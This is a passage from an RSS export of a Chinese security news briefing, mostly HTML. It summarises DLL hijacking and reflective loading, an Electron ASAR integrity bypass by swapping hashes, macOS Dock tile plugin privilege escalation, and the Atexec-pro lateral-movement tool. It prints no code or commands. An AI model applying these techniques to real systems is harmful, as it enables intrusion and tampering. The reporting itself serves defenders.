	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL劫持利用了Windows应用程序加载DLL的顺序，通过将恶意DLL放置在搜索路径的前面，可以实现对应用程序的控制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">已知DLL列表和安全搜索顺序是Windows防止DLL劫持的两种防御机制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">导出表克隆和动态IAT修补是DLL劫持的两种高级技术，它们可以在不影响应用程序原有功能的情况下，将函数调用重定向到恶意代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">反射性DLL加载是一种在内存中加载和执行DLL的技术，它可以绕过文件系统检测，使得恶意DLL更难被发现。</section></li></ul>
	<br/>
	<p>🏷️: DLL劫持, Windows安全, 恶意软件, 攻击技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 Electron JS ASAR 完整性绕过</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本网页主要介绍了如何绕过Electron JS应用程序中的ASAR文件完整性检查。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoHZSMJufGf72rtCGuBbIPxyZ2jpEm6s4kSIdia4cFveRf46CJ7kTliczw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoHZSMJufGf72rtCGuBbIPxyZ2jpEm6s4kSIdia4cFveRf46CJ7kTliczw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844215122111288"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Electron JS框架的ASAR文件完整性检查机制是为了防止应用程序代码被篡改。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过计算ASAR文件头部信息的SHA256哈希值，可以获取与主执行文件中存储的哈希值相匹配的正确哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使在没有错误日志的情况下，也可以通过应用程序崩溃时显示的错误信息来获取新的ASAR文件哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开发者可以通过修改ASAR文件，并在主执行文件中更新相应的哈希值来绕过完整性检查。</section></li></ul>
	<br/>
	<p>🏷️: Electron JS, ASAR, 完整性, 应用程序, 代码安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 Dock图标插件或可用于提权</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了macOS中Dock tile插件的安全风险，这些插件可能被用于提升权限，导致特权升级和虚拟机逃逸的漏洞，并最终得到了Apple在macOS Sonoma 14.4版本中的修复。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="mp_miniprogram_iframe js_uneditable custom_select_card" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoU4WRuAf2icwOh0arNjGCqtN37d3ouAb9QluBtJqVU7vk4BnHD1GogdQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoU4WRuAf2icwOh0arNjGCqtN37d3ouAb9QluBtJqVU7vk4BnHD1GogdQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412141558451"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Dock tile插件的设计允许应用在未运行时自定义Dock图标，但这也带来了安全风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">如果Dock tile插件存在于所有用户可访问的目录，它们就可能被用于实现标准到管理员用户的权限升级。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在虚拟机环境中，如果共享文件夹被启用，Dock tile插件可以被用来实现虚拟机逃逸。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Apple在macOS Sonoma 14.4版本中修复了这个漏洞，通过检查应用程序的数据容器来确保插件的安全加载。</section></li></ul>
	<br/>
	<p>🏷️: macOS, 插件, 权限提升</p></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100003914" data-ratio="0.6694444444444444" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=88f91a6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZn2Du7Y5V92JTr3kZxnw3OolNew6IjUtXCMq4LCWjPUM2CRx21x3fVr68mdgL4CcIHBTmM9njiczQw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: initial;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=991c0b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3nwksKq8ZBqrghjtia9TYiblaxU2VXrUpDcAM57Ric0wX9pBg69IusWVyg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487565">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9be182f2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487565%26idx%3D1%26sn%3D5dede3202afe5235a887e85139d6a3b8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 20 Jul 2024 09:26:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0719 | nculei反制、yt-dlp反制、jump漏洞等</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487546&amp;idx=1&amp;sn=d1287857ffd6a62fcd91721f5e93c44d</link>
      <description>0719: nculei反制、yt-dlp反制、jump漏洞等</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-19 09:13</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>0719: nculei反制、yt-dlp反制、jump漏洞等</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=7d407cc0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmjr11OHn3icLket3eaqgExkrNibVNTFDFt2ROBhxQeoBNcfAV0xRhZD3lvXWXMgNIspux4H8yTturA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;"><span style="color: rgb(0, 150, 136);font-size: 22px;font-weight: bold;letter-spacing: 0em;text-align: center;text-indent: 0em;word-spacing: 0em;">       2024-07-19 安全「信息差」</span><h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;"><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"><span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;">
		<span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送「新、热、赞」，降噪增效<br/></p>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			2. 查漏补缺，你可能错过了一些小东西</p>
	</blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 下一代渗透测试工具Atexec-pro：利用任务调度器（无需端口445）</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Atexec-pro是一个基于atexec.py修改的下一代渗透测试工具，它通过任务调度器执行命令，支持文件上传、下载以及.Net程序集的执行，主要依赖TSCH服务，无需使用端口445。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkU5UibS9eGx3g7BDpfh71iaSPQ75iaW9T90tGXud6qQuVRCPWf16zNcnIA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkU5UibS9eGx3g7BDpfh71iaSPQ75iaW9T90tGXud6qQuVRCPWf16zNcnIA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412285588211"></mp-common-miniprogram>
	</section><section><img class="rich_pages wxw-img" data-imgfileid="100003895" data-ratio="0.6287037037037037" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=25007e0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmjr11OHn3icLket3eaqgExkY1Zus5JUlAJiaFIpd7ribfF9lFEjgkQoxGPPqW8MExorCfNVlahyn9Xg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 